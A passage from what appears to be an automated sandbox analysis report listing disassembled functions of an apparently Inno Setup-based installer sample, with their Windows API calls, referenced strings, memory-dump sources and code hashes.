                                                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478370 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8), ref: 004783CC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                            • API String ID: 2704155762-2318956294
                                                                                                                            • Opcode ID: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                                            • Opcode Fuzzy Hash: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                            • LocalFree.KERNEL32(0065E268,00000000,00401B68), ref: 00401ACF
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0065E268,00000000,00401B68), ref: 00401AEE
                                                                                                                            • LocalFree.KERNEL32(0065F268,?,00000000,00008000,0065E268,00000000,00401B68), ref: 00401B2D
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 3782394904-1137534704
                                                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00459E0C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                                              • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                                            Strings
                                                                                                                            • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                                            • Deleting directory: %s, xrefs: 00459E5B
                                                                                                                            • Stripped read-only attribute., xrefs: 00459E94
                                                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                                            • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseErrorFindLast
                                                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                            • API String ID: 754982922-1448842058
                                                                                                                            • Opcode ID: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                            • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                                            • Opcode Fuzzy Hash: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                            • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00422E50 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCapture.USER32 ref: 00422EA4
                                                                                                                            • GetCapture.USER32 ref: 00422EB3
                                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                                            • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                                            • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                                            • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 862346643-0
                                                                                                                            • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                            • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                                            • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                            • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042F290 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                                            • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                                            • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveLong$Message
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2785966331-0
                                                                                                                            • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                            • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                                            • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                            • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00429480 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0042948A
                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1583807278-0
                                                                                                                            • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                            • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                                            • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                            • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041DE24 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 225703358-0
                                                                                                                            • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                                                            • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                                                            • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                                                            • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00463240 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                                            • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$Load
                                                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                                                            • API String ID: 1675784387-1948079669
                                                                                                                            • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                            • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                                            • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                            • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00453D30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                            • API String ID: 390214022-3304407042
                                                                                                                            • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                            • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                                            • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                            • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00476C50 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                                            • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                                            • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassInfoLongMessageSendWindow
                                                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                            • API String ID: 3391662889-4234151509
                                                                                                                            • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                            • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                                                            • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                                            • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408720 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                              • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                            • API String ID: 1044490935-665933166
                                                                                                                            • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                            • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                                                            • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                                            • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004116F4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                                              • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                                              • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                            • String ID: ,$?
                                                                                                                            • API String ID: 2359071979-2308483597
                                                                                                                            • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                            • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                                            • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                            • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BE63 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
